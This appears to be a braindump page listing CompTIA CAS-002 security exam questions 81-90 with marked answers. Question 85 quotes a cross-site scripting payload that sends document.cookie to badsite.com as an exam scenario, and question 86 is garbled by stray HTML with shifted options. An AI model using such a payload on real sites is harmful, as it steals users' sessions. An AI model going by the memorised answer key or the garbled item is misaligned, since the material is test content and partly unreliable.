[Free] Download New Updated (December) CompTIA CAS-002 Exam Questions 81-90

Ensurepass

QUESTION 81

A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. While the business is lucrative, they do not have the resources or the scalability to adequately serve their clients. Since it is an e-discovery firm where chain of custody is important, which of the following scenarios should they consider?

 

A.

Offload some data processing to a public cloud

B.

Aligning their client intake with the resources available

C.

Using a community cloud with adequate controls

D.

Outsourcing the service to a third party cloud provider

Correct Answer: C

 

 

QUESTION 82

A security engineer is responsible for monitoring company app
lications for known vulnerabilities. Which of the following is a way to stay current on exploits and information security news?

 

A.

Update company policies and procedures

B.

Subscribe to security mailing lists

C.

Implement security awareness training

D.

Ensure that the organization vulnerability management plan is up-to-date

 

Correct Answer: B

 

 

QUESTION 83

Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions. When speaking with the network administrator, the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption. Which of the following solutions minimizes the performance impact on the router?


 

A.

Deploy inline network encryption devices

B.

Install an SSL acceleration appliance

C.

Require all core business applications to use encryption

D.

Add an encryption module to the router and configure IPSec

 

Correct Answer: A

 

 

QUESTION 84

A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company’s online shopping application. Based on heuristic information from the Security Operations Center (SOC), a Denial of Service Attack (DoS) has been successfully executed 5 times a year. The Business Operations department has determined the loss associated to each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation?

 

A.

$60,000

B.

$100,000

C.

$140,000

D.

$200,000

 

Correct Answer: A

 

 

QUESTION 85

A security administrator notices the following line in a server’s security log:

 

<input name=’credentials’ type=’TEXT’ value='” + request.getParameter(‘><script>document.location=’http://badsite.com/?q=’document.cooki e</script>’) + “‘;

 

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?

 

A.

WAF

B.

Input validation

C.

SIEM

D.

Sandboxing

E.

DAM

 

Correct Answer: A

 

 

QUESTION 86

The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. The helpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters, which of the following tools should the helpdesk manager use to make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO).

 

< td style="border-top-style: none; border-left-style: none; background: white; border-bottom-style: none; padding-bottom: 0cm; padding-top: 0cm; border-right-style: none; padding-left: 0cm; padding-right: 0cm" valign="top" width="708">

Presence

A.

Web cameras

B.

Email

C.

Instant messaging

D.

BYOD

E.

Desktop sharing

F.

 

Correct Answer: CE

 

 

QUESTION 87

A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem?

 

A.

Refuse LM and only accept NTLMv2

B.

Accept only LM

C.

Refuse NTLMv2 and accept LM

D.

Accept
only NTLM

 

Correct Answer: A

 

 

QUESTION 88

Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method. Which of the following methodologies should be adopted?

 

A.

The company should develop an in-house solution and keep the algorithm a secret.

B.

The company should use the CEO’s encryption scheme.

C.

The company should use a mixture of both systems to meet minimum standards.

D.

The company should use the method recommended by other respected information security organizations.

 

Correct Answer: D

 

 

QUESTION 89

The technology steering committee is struggling with increased requirements stemming from an increase in telecommuting. The organization has not addressed telecommuting in the past. The implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from remote locations with corporate assets. Which of the following steps must the committee take FIRST to outline senior management’s directives?

 

A.

Develop an information classification scheme that will properly secure data on corporate systems.

B.

Implement database views and constrained interfaces so remote users will be unable to access PII from personal equipment.

C.

Publish a policy that addresses the security requirements for working remotely with company equipment.

D.

Work with mid-level managers to identify and document the proper procedures for telecommuting.

&
nbsp;

Correct Answer: C

 

 

QUESTION 90

The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?

 

A.

Cloud-based antivirus solution, running as local admin, with push technology for definition updates.

B.

Implementation of an offsite data center hosting all company data, as well as deployment of VDI for all client computing needs.

C.

Host based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs.

D.

Behavior based IPS with a communication link to a cloud based vulnerability and threat feed.

 

Correct Answer: D

 

Free VCE & PDF File for CompTIA CAS-002 Real Exam

Instant Access to Free VCE Files: CompTIA | VMware | SAP …
Instant Access to Free PDF Files: CompTIA | VMware | SAP …

This entry was posted in CAS-002 Exam Questions (December) and tagged , , , , , , . Bookmark the permalink.